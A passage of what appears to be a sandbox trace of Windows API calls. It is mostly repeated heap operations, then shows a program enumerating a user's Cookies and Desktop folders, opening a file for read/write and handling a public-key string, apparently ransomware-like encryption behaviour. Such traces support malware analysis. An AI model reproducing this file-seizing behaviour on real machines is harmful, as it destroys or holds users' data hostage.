hHeap=0x620000) returned 1 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0235.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0235.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0235.955] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0235.955] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0235.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.955] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0235.955] PathFindFileNameW (pszPath="") returned="" [0235.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0236.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0236.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.008] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0236.008] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0236.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0236.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0236.008] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0236.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.008] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0236.008] PathFindFileNameW (pszPath="") returned="" [0236.008] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x828f3260, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x828f3260, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0236.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0236.009] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x828f3260, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0x828f3260, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0236.009] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f00670, ftCreationTime.dwHighDateTime=0x1d5c237, ftLastAccessTime.dwLowDateTime=0x221e1f80, ftLastAccessTime.dwHighDateTime=0x1d5c06f, ftLastWriteTime.dwLowDateTime=0x221e1f80, ftLastWriteTime.dwHighDateTime=0x1d5c06f, nFileSizeHigh=0x0, nFileSizeLow=0x554, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-G-HIJj-GN6to.avi", cAlternateFileName="-G-HIJ~1.AVI")) returned 1 [0236.009] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-G-HIJj-GN6to.avi") returned=".avi" [0236.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-G-HIJj-GN6to.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-g-hijj-gn6to.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.009] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=1364) returned 1 [0236.009] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.012] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x52e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.012] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.013] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x554, lpOverlapped=0x0) returned 1 [0236.013] lstrlenA (lpString="-----BEGIN PUBLIC 